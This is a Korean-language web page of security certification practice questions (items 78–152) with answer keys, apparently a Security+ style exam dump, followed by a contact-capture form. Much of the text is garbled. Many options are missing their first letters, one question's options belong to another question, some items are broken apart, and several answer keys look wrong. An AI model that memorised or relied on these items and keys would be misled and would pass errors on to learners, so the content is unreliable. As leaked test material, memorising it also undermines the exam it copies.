정부 기관에서 근무하는 보안 관리자는 분류 및 세분화된 계획을 활용하여 일급 비밀 데이터를 보호하고 알아야 할 필요성에 따라 액세스 권한을 부여하려고 합니다. 관리자가 고려해야 할 액세스 제어 스키마는 다음 중 어느 것입니까?
A. 필수
B. 칙 기반
C. 량
D. 할 기반
답변 보기
정답: A
질문 #78
보안 평가 중에 보안 분석가가 지나치게 허용적인 권한을 가진 파일을 발견했습니다. 다음 중 분석가가 기존 사용자 및 그룹에 대한 권한을 줄이고 파일에서 set-user-ID 비트를 제거할 수 있는 도구는 무엇인가요?
A. s
B. hflags
C. hmod
D. sof
E. etuid
답변 보기
정답: C
질문 #79
다음 중 IDS와 WAF가 HTTPS 트래픽에 효과적이기 위해 필요한 것은 무엇인가요?
A. 싱
B. NS 싱크홀
C. LS 검사
D. 이터 마스킹
답변 보기
정답: C
질문 #80
네트워크 엔지니어가 사용자가 신고한 무선 네트워크 연결 문제를 해결하고 있습니다. 이 문제는 주차장과 가장 가까운 건물 구간에서만 발생하고 있습니다. 사용자가 웹사이트에 액세스할 때 간헐적으로 느린 속도를 경험하고 네트워크 드라이브에 연결할 수 없습니다. 노트북 사용자가 건물의 다른 구역에서 디바이스를 사용한 후 책상으로 돌아올 때 문제가 더 심해지는 것으로 보입니다. 또한 사용자가 로그인할 때 다음과 같이 입력해야 한다는 보고도 있었습니다
A. 부 액세스 포인트가 이블 트윈 공격에 가담하고 있습니다
B. 건물의 해당 구간에서 WAP의 신호가 증가해야 합니다
C. 장치에서 인증서가 만료되었으므로 다시 설치해야 합니다
D. 건물의 해당 섹션에 있는 사용자가 방화벽에 의해 차단되는 VLAN을 사용하고 있습니다
답변 보기
정답: A
질문 #81
한 조직에서 해커가 시설에 침입하여 원격으로 액세스할 수 있는 Kali Linux 박스를 연결할 가능성이 있다고 우려하고 있습니다. 다음 중 이러한 공격에 대한 첫 번째 방어선이 되어야 하는 것은 무엇인가요? (두 가지를 선택하세요.)
A. 소셜 미디어 분석
B. 간 정보 보안 교육
C. 임화
D. 싱 캠페인
답변 보기
정답: BC
질문 #82
보안 관리자는 모든 클라우드 서버에 취약성 스캔 및 지속적인 모니터링을 용이하게 하기 위한 소프트웨어가 사전 설치되어 있는지 확인하고자 합니다. 다음 중 관리자가 활용해야 하는 개념은 무엇인가요?
A. 로비저닝
B. 테이징
C. 테이징
D. 질 보증
답변 보기
정답: A
질문 #83
다음 중 소프트웨어에 포함된 타사 라이브러리에 존재하는 보안 결함을 프로덕션 환경에 배포하기 전에 탐지하는 가장 효과적인 방법은 무엇인가요?
A. 서버 측과 클라이언트 측 유효성 검사에 서로 다른 기술 사용
B. 타사 라이브러리에는 다른 버전 관리 시스템 사용
C. 약성 스캔을 구현하여 SDLC에서 종속성을 조기에 평가합니다
D. 프트웨어 출시 전 침투 테스트 횟수 증가
답변 보기
정답: C
질문 #84
다음 중 인증에 SAML을 사용하는 것은 무엇인가요?
A. TOTP
B. 연맹
C. Kerberos
D. HOTP
답변 보기
정답: B
질문 #85
시뮬레이션시스템 관리자는 인증된 게스트 액세스를 위해 새 무선 네트워크를 설치해야 합니다. 무선 네트워크는 사용 가능한 가장 안전한 암호화 및 프로토콜을 사용하여 802.1X를 지원해야 합니다.지침다음 단계를 수행합니다.4. RADIUS 서버 구성.5. WiFi 컨트롤러 구성.6. 들어오는 게스트에 대해 클라이언트를 사전 구성합니다. 게스트 AD 자격 증명은 다음과 같습니다.사용자: guest01암호: guestpass언제든지 시뮬레이션의 초기 상태로 되돌리려면, 언제든지 다음을 클릭하세요
A. 래 설명을 참조하세요
답변 보기
정답: A
질문 #86
보안 분석가가 공격을 조기에 탐지하는 데만 사용되는 앱 관리자 테스트 계정에 누군가 로그인했다는 SIEM 알림을 받습니다. 보안 분석가는 다음 애플리케이션 로그를 검토합니다. 다음 중 보안 분석가가 결론을 내릴 수 있는 것은 무엇인가요?
A. 플리케이션에 대한 리플레이 공격이 수행되고 있습니다
B. 용자 인증 시스템에 대한 인젝션 공격이 수행되고 있습니다
C. 비스 계정 비밀번호가 변경되어 애플리케이션 내에서 계속 로그인에 실패하는 경우가 있습니다
D. 자격 증명 취약점 스캐너 공격은 애플리케이션에 대해 여러 CVE를 테스트하고 있습니다
답변 보기
정답: B
질문 #87
다음 중 코드가 작성되는 즉시 메인 코드베이스에 포함되는 것은 무엇인가요?
A. 지속적인 모니터링
B. 속적인 배포
C. 속적인 검증
D. 속적 통합
답변 보기
정답: D
질문 #88
한 회사가 유럽 고객의 개인 정보를 처리하는 방식을 감사하고 있습니다. 이 회사는 다음 중 어느 쪽에 문의해야 하나요?
A. DPR
B. SO
C. IST
D. CI DSS
답변 보기
정답: A
질문 #89
한 조직이 네트워크에서 맬웨어가 발생하여 사고 대응 계획을 활성화했습니다. 이 조직은 포렌식 팀을 투입하여 인터넷에 연결된 Windows 서버를 초기 침해 지점으로 파악했습니다. 탐지된 멀웨어 제품군은 서버에 수동으로 로그온하여 악성 코드를 실행하는 방식으로 유포되는 것으로 알려져 있습니다. 다음 중 감염 경로로부터 재감염을 방지하기 위한 가장 좋은 조치는 무엇인가요?
A. 내부 네트워크에서 TFTP를 통한 연결을 차단합니다
B. 인터넷에서 서버로 22를 차단하는 방화벽 규칙을 만듭니다
C. 포트 445를 통한 서버와의 파일 공유를 비활성화합니다
D. 신뢰할 수 없는 네트워크에서 인바운드되는 포트 3389를 차단합니다
답변 보기
정답: C
질문 #90
보안 분석가가 인시던트 발생 후 웹 서버에 대한 최신 취약점 스캔 보고서를 검토하고 있습니다. 취약점 보고서에는 우려할 만한 발견 사항이 없습니다. 서버를 익스플로잇하는 데 사용된 취약점은 과거 취약점 스캔 보고서에 존재하며 해당 취약점에 대한 패치가 제공됩니다. 다음 중 가장 가능성이 높은 원인은 무엇인가요?
A. 전 비호환성으로 인해 보안 패치를 설치하지 못했습니다
B. 격자가 취약점 스캔 보고서를 변경했습니다
C. 서버를 익스플로잇하는 데 제로데이 취약점이 사용되었습니다
D. 검사에서 취약점에 대해 잘못된 음성이 보고되었습니다
답변 보기
정답: D
질문 #91
한 회사에서 PHI 문서의 이메일 전송을 제한하려고 합니다. 회사에서 DLP 솔루션을 구현하고 있습니다. PHI 문서를 제한하려면 다음 중 어떤 작업을 먼저 수행해야 하나요?
A. 유
B. 버넌스
C. 류
D. 경 관리
답변 보기
정답: C
질문 #92
회사 직원들이 회사 휴대폰으로 원치 않는 문자 메시지를 받고 있습니다. 원치 않는 문자 메시지에는 비밀번호 재설정 링크가 포함되어 있습니다. 다음 중 회사를 공격하기 위해 사용되고 있는 공격은 무엇인가요?
A. 싱
B. ishing
C. 미싱
D. 팸
답변 보기
정답: C
질문 #93
한 회사가 새로운 위치로 이전합니다. 시스템 관리자가 시설 직원에게 다음과 같은 서버실 요구 사항을 제공했습니다.-정전 또는 전압 스파이크 시 일관된 전력 수준-정전 후 최소 30분의 런타임-중요 시스템의 정상 종료 트리거 기능다음 중 요구 사항을 가장 잘 충족하는 것은 무엇인가요?
A. 대기 중인 가스 동력 발전기 유지 관리
B. 퓨터 장비에 대형 서지 억제기 사용
C. 력 레벨을 모니터링하도록 관리형 PDU 구성하기
D. 절한 크기의 네트워크 연결 UPS 장치 배포
답변 보기
정답: D
질문 #94
다음 중 많은 조직에 영향을 미치는 빠르게 확산되는 공격을 차단하는 데 가장 효과적인 방법은 무엇인가요?
A. 신 러닝
B. NS 싱크홀
C. 단 목록
D. 니팟
답변 보기
정답: B
질문 #95
최근 모의 침투 테스트 중에 테스터는 인터넷을 통해 12개월 동안 대량의 데이터가 유출된 것을 발견합니다. 모의 침투 테스터는 고객에게 결과를 알리기 위해 테스트를 중단합니다. 다음 중 문제를 완화하기 위해 클라이언트가 다음 단계로 취해야 할 조치는 무엇인가요?
A. 전체 취약점 검사를 수행하여 가능한 취약점을 식별합니다
B. 중요한 서버와 리소스에 대한 봉쇄를 수행합니다
C. 화벽을 검토하고 활성 연결의 출처를 파악합니다
D. 체 인프라를 인터넷에서 분리합니다
답변 보기
정답: B
질문 #96
한 보안 분석가가 회사의 사용자 이름과 비밀번호 데이터베이스가 인터넷 포럼에 게시된 것을 발견했습니다. 사용자 이름과 비밀번호는 일반 텍스트로 저장되어 있습니다. 다음 중 향후 이러한 유형의 데이터 유출로 인한 피해를 완화할 수 있는 방법은 무엇인가요?
A. 문서가 네트워크를 떠나는 것을 방지하는 DLP 제어 기능을 만듭니다
B. 솔팅 및 해싱을 구현합니다
C. 럼에 대한 액세스를 차단하도록 웹 콘텐츠 필터를 구성합니다
D. 비밀번호 복잡성 요구 사항 증가
답변 보기
정답: B
질문 #97
다음 중 위험 회피의 예는 무엇인가요?
A. 약점 수정을 신속하게 처리하기 위해 프로덕션에 직접 보안 업데이트 설치하기
B. 스플로잇과 관련된 금전적 손실에 대비하기 위한 보험 가입
C. 환성 오류를 방지하기 위해 새 소프트웨어를 설치하지 않음
D. 비 도난을 막기 위한 예방 조치를 취하지 않음
답변 보기
정답: C
질문 #98
한 보안 설계자가 민감한 데이터를 전송하는 이메일 솔루션을 개발 중입니다. 그러나 현재 예산에는 추가 인프라를 구축할 수 있는 자금이 없습니다. 다음 중 설계자가 선택해야 하는 것은 무엇인가요?
A. OP
B. PSec
C. MAP
D. GP
답변 보기
정답: D
질문 #99
다음 중 인증 방법 및 무단 액세스 시도에 대한 경고 메커니즘으로 사용할 수 있는 것은 무엇인가요?
A. 스마트 카드
B. 시 알림
C. 명 서비스
D. MAC 기반
E. 회용 비밀번호
답변 보기
정답: B
질문 #100
한 회사에서 파일 서버에 DLP 솔루션을 구현하고 있습니다. 파일 서버에는 PII, 금융 정보, 건강 정보가 저장되어 있습니다. 파일 서버에서 호스팅되는 데이터의 유형에 따라 회사는 데이터에 서로 다른 DLP 규칙을 할당하려고 합니다. 이 목표를 달성하기 위해 회사가 해야 할 일은 다음 중 어느 것일까요?
A. 데이터를 분류합니다
B. 데이터를 마스킹합니다
C. 플리케이션 소유자를 지정합니다
D. 험 분석을 수행합니다
답변 보기
정답: A
질문 #101
고객인 Ann은 모기지 회사로부터 일상적인 비즈니스 운영을 유지하기 위해 파트너, 계열사 및 직원과 PII를 공유할 수 있다는 알림을 받았습니다. Ann이 받은 문서는 다음 중 어느 것입니까?
A. 간 개인정보 보호 고지
B. 공개 계약
C. 권한 있는 사용자 계약
D. 양해각서
답변 보기
정답: A
질문 #102
다음 중 물리적 또는 가상 시스템의 치명적인 손실이 발생한 경우 수행해야 할 작업을 명시한 문서는 무엇인가요?
A. 이터 보존 요금제
B. 고 대응 계획
C. 해 복구 계획
D. 뮤니케이션 계획
답변 보기
정답: C
질문 #103
직원의 회사 이메일은 조건부 액세스로 구성되며 MFA를 활성화하고 사용해야 합니다. MFA의 예로는 전화 통화 및:
A. 시 알림
B. 비밀번호
C. MS 메시지
D. n 인증 애플리케이션
답변 보기
정답: B
질문 #104
한 조직에서 새로운 보안 시스템을 도입했습니다. 현지 법률에 따르면 악의적인 활동을 억제하기 위해 탐지 메커니즘이 발생하기 전에 시민들에게 알려야 합니다. 다음 중 어느 것이 시행되고 있나요?
A. 가드가 있는 근접 카드
B. 기 울타리
C. 람이 있는 드론
D. 이니지가 있는 모션 센서
답변 보기
정답: D
질문 #105
사고 대응 기술자가 조사 중에 모바일 기기를 수거했습니다. 다음 중 기술자가 소유권 연쇄를 유지하기 위해 해야 할 일은 무엇인가요?
A. 수거를 문서화하고 소유권이 변경되면 결재를 받아야 합니다
B. 난이나 변조를 방지하기 위해 기기를 금고나 기타 안전한 장소에 보관하세요
C. 이터 손상을 방지하기 위해 장치를 패러데이 케이지에 넣습니다
D. 록체인으로 보호되는 공개 원장에 수집 내용을 기록합니다
답변 보기
정답: A
질문 #106
다음 중 매우 민감한 프로젝트에서 이러한 제품을 사용하는 것을 고려할 때 UI 개발자 계약에 관여하는 고객이 주의해야 할 사항은 무엇인가요?
A. 한 구성
B. 합 활동
C. 안되지 않은 사용자 계정
D. 웃소싱 코드 개발
답변 보기
정답: A
질문 #107
다음 중 보안 인시던트의 근본 원인을 파악한 후 향후 인시던트 발생을 방지하기 위해 수행되는 절차는 무엇인가요?
A. 연습
B. 훈
C. 격 프레임워크 정렬
D. 쇄
답변 보기
정답: B
질문 #108
다음 중 초기 구성의 일부로 새 네트워크 장치에 레이블을 지정하는 방법에 대한 지침을 제공하는 것은 무엇인가요?
A. P 스키마
B. 플리케이션 기준 구성
C. 준 명명 규칙 정책
D. 선 LAN 및 네트워크 경계 다이어그램
답변 보기
정답: C
질문 #109
보안 분석가가 회사 웹 애플리케이션에 대한 무단 액세스로 보이는 것을 조사하고 있습니다. 보안 분석가가 웹 서버 로그를 검토하여 다음 중 어떤 비밀번호 공격이 발생하고 있나요?
A. 전
B. 차별 대입
C. 인보우 테이블
D. 프레이
답변 보기
정답: B
질문 #110
한 조직에서 새로운 모바일 기기 정책을 시행하고 각 직원에게 새 노트북을 지급할 계획입니다. 이 노트북은 사용자의 회사 운영 체제에 원격으로 액세스하여 업무 이외의 용도로 노트북을 사용할 수 있도록 허용합니다. 다음 중 어떤 배포 모델을 활용하고 있나요?
A. 차별 대입
B. 로거
C. 전
D. ainbow
답변 보기
정답: C
질문 #111
내부 네트워크에서 승인되지 않은 디바이스가 감지되었습니다. 해당 디바이스의 위치는 회의실에 위치한 이더넷 포트로 추적되었습니다. 다음 중 이러한 장치가 내부 네트워크에 액세스하지 못하도록 하기 위해 구현할 수 있는 가장 좋은 기술적 제어는 무엇인가요?
A. AC
B. LP
C. DS
D. FA
답변 보기
정답: A
질문 #112
소프트웨어 및 인프라 비용을 절감하고 제한하기 위해 최고 정보 책임자는 이메일 서비스를 클라우드로 이전할 것을 요청했습니다. 클라우드 제공업체와 조직은 민감한 데이터를 보호하기 위한 보안 제어 기능을 갖추고 있어야 합니다. 다음 중 이 요청을 가장 잘 수용할 수 있는 클라우드 서비스는 무엇인가요?
A. aaS
B. aaS
C. aaS
D. aaS
답변 보기
정답: D
질문 #113
보안 관리자는 모든 클라우드 자산에 대해 매주 취약성 검사를 수행하고 자세한 보고서를 제공합니다. 다음 중 관리자의 활동을 설명하는 것은 무엇인가요?
A. 지속적인 배포
B. 속적인 통합
C. 이터 소유자
D. 이터 프로세서
답변 보기
정답: D
질문 #114
최고 정보 보안 책임자(CISO)가 타사 공급업체에 고객 데이터를 보호하기 위해 적절한 통제가 이루어지고 있음을 보여주는 증빙 문서를 제공하도록 요청했습니다. 다음 중 타사 공급업체가 CISO에게 제공하는 것이 가장 좋은 것은 무엇인가요?
A. DPR 준수 증명
B. loud 보안 연합 자료
C. OC 2 유형 2 보고서
D. IST RMF 통합 문서
답변 보기
정답: C
질문 #115
다음 중 사람의 긴박감을 악용하는 사회 공학 기법을 설명하는 것은 무엇인가요?
A. 금 결제가 이루어졌지만 곧 만료된다는 피싱 이메일이 발송되었습니다
B. 배 픽업이 예정되어 있다는 스미싱 메시지
C. 역 자선 단체에 기부를 요청하는 C
A. 피싱 전화
D. 이버 범죄를 수사 중인 법 집행 기관을 사칭하는 D
답변 보기
정답: C
질문 #116
사고 대응 중에 분석가가 경계 방화벽의 모든 인바운드 트래픽에 규칙을 적용하고 각 중요 서버에 ACL을 구현했습니다. 조사 결과, 아웃바운드 트래픽이 제한되지 않아 공격자가 네트워크에 계속 존재할 수 있기 때문에 여전히 취약하다는 것을 알게 되었습니다.다음 중 공격자가 현재 사이버 킬 체인의 어느 단계에서 활동하고 있습니까?
A. 찰
B. 령 및 제어
C. 적에 대한 조치
D. 취
답변 보기
정답: B
질문 #117
보안 분석가가 하루 중 특정 시간대에 네트워크가 악성 패킷으로 넘쳐나는 것을 발견했습니다. 분석가가 이 문제를 조사하기 위해 다음 중 어떤 것을 사용해야 하나요?
A. 메타데이터
B. 역폭 모니터
C. ystem 파일
D. 관관계 대시보드
답변 보기
정답: B
질문 #118
보안 엔지니어가 회사를 위해 새로운 무선 네트워크를 배포하고 있습니다. 이 회사는 여러 테넌트와 사무실 공간을 공유합니다. 기밀 데이터가 권한이 없는 사용자에게 노출되지 않도록 하기 위해 엔지니어가 무선 네트워크에서 구성해야 하는 것은 다음 중 어느 것인가요?
A. AP
B. LS
C. TTPS
D. ES
답변 보기
정답: D
질문 #119
다음 중 증거를 수집하여 당국에 제공할 때 법적 절차에서 증거가 인정될 수 있도록 보장하기 위해 사용되는 것은 무엇인가요?
A. 리 체인
B. 적 보류
C. 벤트 로그
D. 티팩트
답변 보기
정답: A
질문 #120
사이버 보안 관리자는 네트워크에 계층 7 보안 제어를 구현하고 잠재적인 공격을 차단해야 합니다. 다음 중 레이어 7에서 공격을 차단할 수 있는 것은 무엇인가요? (두 개를 선택하세요.)
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
답변 보기
정답: BD
질문 #121
보안 건물로 들어가는 길에 신원을 알 수 없는 사람이 직원과 대화를 시작합니다. 직원은 출입문에서 필요한 배지를 스캔하고, 신원 미상의 개인은 직원을 위해 예의상 문을 열어주는 것처럼 보입니다. 다음 중 어느 사회 공학 기법이 활용되고 있습니까?
A. 숄더 서핑
B. 터링 홀 공격
C. 일게이팅
D. 칭
답변 보기
정답: C
질문 #122
포렌식 조사관이 회사 웹사이트에서 보고된 여러 건의 무단 결제를 조사하고 있습니다. 일부 비정상적인 로그 항목에 따르면 사용자가 원치 않는 메일링 리스트의 이메일을 받고 링크를 클릭하여 구독 취소를 시도한 것으로 나타났습니다. 사용자 중 한 명이 피싱 팀에 해당 이메일을 신고했으며, 전달된 이메일의 링크는 구독을 취소하려면 여기를 클릭하세요다음 중 포렌식에서는 다음 중 어느 것을 확인하나요?
A. QL 주입
B. 증 실패
C. SS
D. SRF
답변 보기
정답: D
질문 #123
보안 분석가는 보안 사고가 발생한 경위, 복구를 위해 취한 조치, 향후 사고를 방지할 수 있는 방법을 자세히 설명하는 문서를 작성해야 합니다. 다음 중 대응 프로세스의 어느 단계에서 이 활동이 이루어지나요?
A. 구
B. 원 확인
C. 훈
D. 비
답변 보기
정답: C
질문 #124
한 직원이 모바일 디바이스로 여러 개의 메시지를 받았습니다. 이 메시지는 직원에게 알 수 없는 장치와 장치를 페어링하도록 지시하는 내용이었습니다. 다음 중 악의적인 사람이 이 문제를 일으키기 위해 어떤 일을 할 수 있는지를 가장 잘 설명하는 것은 무엇인가요?
A. 밍
B. 루스나핑
C. 블 트윈 공격
D. ogue 액세스 포인트
답변 보기
정답: B
질문 #125
다음 중 IT 운영 중단이 가장 적게 필요한 재해 복구 계획 연습 유형은 무엇인가요?
A. arallel
B. 격화
C. 이블탑
D. 뮬레이션
답변 보기
정답: C
질문 #126
회사가 신뢰할 수 있는 파트너 웹사이트에 로그인할 때 최종 사용자의 경험을 개선하고자 합니다. 회사는 사용자에게 파트너 웹사이트에 대한 별도의 자격 증명을 발급하지 않기를 원합니다. 사용자가 자신의 자격 증명을 사용하여 신뢰할 수 있는 파트너 웹사이트에 로그인할 수 있도록 하려면 다음 중 어떤 것을 구현해야 하나요?
A. 렉토리 서비스
B. AA 서버
C. ederation
D. 단계 인증
답변 보기
정답: C
질문 #127
보안 엔지니어가 MF를 사용하도록 구성된 SAML 애플리케이션의 로그를 검토하고 있습니다
A. 이 검토 중에 엔지니어는 해외 여행 중인 사용자로부터 MFA가 필요하지 않은 로그인 성공 횟수가 많다는 사실을 발견했습니다
B.
A. MFA 요구 사항이 작동하려면 OpenID가 필수입니다
C.
D.
E.
답변 보기
정답: D
질문 #128
다음 중 포트 80을 통해 회사 데이터를 훔치는 해커를 탐지하는 데 사용할 수 있는 방법은 무엇인가요?
A. PS 태깅
B. 격 삭제
C. 면 잠금 타이머
D. EA안드로이드
답변 보기
정답: D
질문 #129
보안 인시던트 조사 중에 분석가가 회사의 SIEM을 참조하여 알려진 악성 명령 및 제어 서버에 대한 높은 트래픽과 관련된 이벤트를 확인합니다. 분석가는 이 문제로 인해 영향을 받을 수 있는 회사 워크스테이션의 수를 파악하고자 합니다. 다음 중 이 정보를 제공할 수 있는 것은 무엇인가요?
A. AF 로그
B. NS 로그
C. 스템 로그
D. 플리케이션 로그
답변 보기
정답: B
질문 #130
보안 분석가는 단일 도구에서 여러 소스의 로그를 검색하고 상호 연관시킬 수 있어야 합니다. 다음 중 보안 분석가가 이러한 능력을 갖추는 데 가장 적합한 것은 무엇인가요?
A. OAR
B. IEM
C. 그 수집기
D. 트워크 연결 스토리지
답변 보기
정답: B
질문 #131
현재 개인 키가 유출된 경우, 다음 중 모든 기록 데이터를 해독하는 데 사용할 수 없도록 보장하는 것은 무엇인가요?
A. 완벽한 전방 비밀
B. 원곡선 암호화
C. 스트레칭
D. 형 암호화
답변 보기
정답: A
질문 #132
사용자 계정이 지속적으로 잠깁니다. 추가 검토 결과, 보안 분석가가 SIEM에서 다음을 발견했습니다. 다음 중 어떤 일이 발생하고 있는지를 설명하는 것은 무엇인가요?
A. 공격자가 계정에 대한 비밀번호 스프레이 공격을 사용하고 있습니다
B. 격자가 계정에 대해 사전 공격을 활용하고 있습니다
C. 격자가 계정에 대해 무차별 대입 공격을 사용하고 있습니다
D. 격자가 계정에 대해 레인보우 테이블 공격을 활용하고 있습니다
답변 보기
정답: C
질문 #133
비즈니스 운영 관리자는 비즈니스 운영에 중요한 PC에 곧 비용이 많이 드는 하드웨어 장애가 발생할까 걱정하고 있습니다. 관리자는 큰 비용을 들이지 않고도 비즈니스 운영을 계속할 수 있는 옵션을 찾고 있습니다. 다음 중 관리자의 걱정을 덜어줄 수 있는 방법은 무엇인가요?
A. 전체 시스템 업그레이드를 구현합니다
B. 물리적 마이그레이션에서 가상 마이그레이션을 수행합니다
C. 무정전 전원 공급 장치를 설치합니다
D. 사이버 보안 보험에 가입합니다
답변 보기
정답: B
질문 #134
최근 한 회사에서 데이터 유출 사고가 발생했는데, 유출자는 공공장소에서 휴대폰을 충전하던 임원으로 밝혀졌습니다. 다음 중 이 유출을 방지할 수 있었을 가능성이 가장 높은 것은 무엇인가요?
A. 화벽
B. 장치 핀
C. USB 데이터 차단기
D. 체인식
답변 보기
정답: C
질문 #135
다음 중 소스 코드 안에 숨겨진 오디오 파일이 있다는 것을 나타내는 것은 무엇인가요?
A. 테가노그래피
B. 형 암호화
C. ipher 제품군
D. 록체인
답변 보기
정답: A
질문 #136
의료비 청구에 대한 정기 감사에서 가입자 모르게 여러 건의 청구가 제출된 것이 발견되었습니다. 의료 청구 회사의 시스템 감사 로그를 검토한 결과 회사 직원이 고객 기록을 다운로드하여 개인 은행 계좌로 자동 이체 정보를 조정한 것으로 나타났습니다.다음 중 이 행위를 설명하는 것은 무엇입니까?
A. 내부자 위협
B. 회 공학
C. 3자 위험
D. 이터 유출
답변 보기
정답: A
질문 #137
한 회사가 마케팅 비즈니스에서 사용할 수 있는 사용자 정보를 수집하기 위해 다른 나라에 웹사이트를 개설합니다. 회사 자체는 이 정보를 사용하지 않을 것입니다. 다음 중 회사가 맡게 될 역할은 무엇인가요?
A. 이터 소유자
B. 이터 프로세서
C. 이터 스튜어드
D. 이터 수집기
답변 보기
정답: D
질문 #138
한 암호화폐 채굴 회사는 최근 모든 채굴 시스템에 새로운 안티바이러스 애플리케이션을 배포했습니다. 이 백신 애플리케이션의 설치는 여러 개인 디바이스에서 테스트되었으며, 아무런 문제도 발견되지 않았습니다. 하지만 바이러스 백신 애플리케이션이 서버에 배포된 후에도 지속적인 문제가 보고되었습니다. 그 결과 회사는 채굴 소프트웨어를 제거하기로 결정했습니다. 바이러스 백신 애플리케이션은 해당 소프트웨어를 다음과 같이 분류했습니다:
A. 루트킷
B. PUP
C. 백도어
D. 섬웨어
E. RAT
답변 보기
정답: B
질문 #139
사용자가 데스크톱을 사용하여 회사 네트워크 내부에서 웹사이트로 이동하려고 합니다. 사용자가 URL(https://www.site.com)을 입력하면 브라우저에서 인증서 불일치 경고가 표시됩니다. Http://www.anothersite.com 방문 시에는 경고가 표시되지 않습니다. 다음 중 이 공격을 설명하는 것은 무엇인가요?
A. 패스
B. 메인 하이재킹
C. NS 중독
D. 블 트윈
답변 보기
정답: B
질문 #140
한 조직이 EAP에 클라이언트 측 및 서버 측 인증서를 사용하지 않고 있습니다. 이 회사는 새로운 EAP 솔루션에 악성 액세스 지점을 탐지하는 기능이 있기를 원합니다. 다음 중 이러한 요구 사항을 충족하는 것은 무엇인가요?
A. EAP
B. AP-FAST
C. AP-TLS
D. AP-TTLS
답변 보기
정답: B
질문 #141
한 회사의 이사회는 조직의 책임을 제한하기 위해 보험 회사와 계약을 맺었습니다. 다음 중 이를 가장 잘 설명하는 위험 관리 관행은 무엇인가요?
A. 전
B. 피
C. 화
D. 정
답변 보기
정답: A
질문 #142
사용자의 노트북이 Wi-Fi 네트워크에서 계속 연결이 끊어집니다. 노트북이 다시 연결되면 사용자는 인터넷에 연결할 수 있지만 공유 폴더나 기타 네트워크 리소스에 액세스할 수 없습니다. 다음 중 사용자가 경험하고 있을 가능성이 가장 높은 공격 유형은 무엇인가요?
A. 루재킹
B. amming
C. ogue 액세스 포인트
D. 블 트윈
답변 보기
정답: D
질문 #143
모의 침투 테스터가 애플리케이션을 퍼징하여 스택의 EIP가 메모리에서 어디에 있는지 확인하려고 합니다. 침투 테스트자는 다음 중 어떤 공격을 실행할 계획인가요?
A. 이스 조건
B. 스더해시
C. 퍼 오버플로
D. SS
답변 보기
정답: C
질문 #144
관리자는 사용자 비밀번호를 보호해야 하며 비밀번호를 해시 처리하라는 권고를 받았습니다. 다음 중 관리자에게 권고된 내용을 가장 잘 설명하는 것은 무엇인가요?
A. 비밀번호를 고유한 문자열로 변환하는 수학적 연산을 수행합니다
B. 비밀번호에 추가 데이터를 추가하여 비밀번호 길이를 늘려 무차별 암호 대입을 어렵게 만듭니다
C. 시스템의 모든 비밀번호를 중앙 집중식 위치에 있는 레인보우 테이블에 저장합니다
D. 로그인 세션마다 변경되는 일회용 비밀번호를 사용하도록 합니다
답변 보기
정답: A
질문 #145
소규모 기업의 시스템 관리자가 무선 라우터를 검토하는 동안 누군가 인증된 장치의 MAC 주소를 스푸핑하는 것을 확인했습니다. 아래 표가 주어졌을 때, 다음 중 가용성에 영향을 주지 않으면서 불량 시스템이 있는지 탐지하기 위해 관리자가 다음 단계로 취해야 할 조치는 무엇인가요?
A. 핑 스윕을 수행합니다,
B. 각 시스템을 물리적으로 확인합니다
C. "UNKNOWN" 호스트 이름에 대한 인터넷 액세스를 거부합니다
D. AC 필터링 적용
답변 보기
정답: A
질문 #146
사용자의 공통 로그인 속성에 대한 기준선을 만들어 원격 액세스 요청을 추적하는 보안 제안이 설정되었습니다. 기준 편차가 감지되면 MFA 챌린지가 트리거됩니다. 이 제안을 배포하려면 다음 중 어떤 것을 구성해야 하나요?
A. 컨텍스트 인식 인증
B. 등한 동시 인증
C. 범위한 인증 프로토콜
D. 이전트 없는 네트워크 액세스 제어
답변 보기
정답: A
질문 #147
분석가는 네트워크의 호스트에 대한 비콘 활동에 대한 여러 알림을 수신합니다. 분석가는 활동을 분석한 후 다음과 같은 활동을 관찰합니다. - 사용자가 웹 브라우저에 comptia.org를 입력함 - 표시되는 웹사이트가 comptia.org 사이트가 아님 - 해당 웹사이트가 공격자의 악성 사이트임 - 다른 사무실의 사용자에게는 이 문제가 발생하지 않음 다음 중 관찰된 공격 유형은 무엇인가요?
A. 패스 공격
B. NS 중독
C. ocator(URL) 리디렉션
D. 메인 하이재킹
답변 보기
정답: C
질문 #148
다음 중 증거에 액세스할 수 있는 사람을 문서화하는 프로세스를 가장 잘 설명하는 것은 무엇인가요?
A. 동성 순서
B. 리 체인
C. 인 방지
D. 용 가능성
답변 보기
정답: B
질문 #149
다음 중 허가되지 않은 직원을 에스코트할 때 직원에게 책임이 있는 것은 무엇인가요?
A. ocks
B. 지
C. 메라
D. 문자 로그
답변 보기
정답: D
질문 #150
다음 중 프로세스가 완료된 후 저장 장치를 재사용할 수 있는 방법을 사용하여 데이터를 제거하는 프로세스는 무엇입니까?
A. 쇄
B. 어쓰기
C. 쇄
D. egaussing
답변 보기
정답: B
질문 #151
보안 분석가는 회사 네트워크 디바이스에 대한 자격 증명과 권한을 중앙에서 관리해야 합니다. 다음 보안 요구 사항을 충족해야 합니다.-네트워크 직원이 수행하는 모든 작업이 기록되어야 함.-명령별 권한 부여가 가능해야 함.-인증 서버와 디바이스가 TCP를 통해 통신해야 함.다음 중 분석가가 선택해야 하는 인증 프로토콜은 무엇인가요?
A. erberos
B. HAP
C. ACACS+
D. ADIUS
답변 보기
정답: C
질문 #152
보안 설계자는 민감한 데이터를 대형 스크린에 표시할 수 있는 일부 워크스테이션을 회의실에 배포해야 합니다. 데이터의 특성상 회의실에 저장할 수 없습니다. 파일 공유는 로컬 데이터 센터에 있습니다. 다음 중 보안 설계자가 이 요구 사항을 가장 잘 충족하기 위해 권장해야 하는 것은 무엇인가요?
A. og 컴퓨팅 및 KVM
B. DI 및 씬 클라이언트
C. 라이빗 클라우드 및 DLP
D. 체 드라이브 암호화 및 씬 클라이언트
답변 보기
정답: B

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호: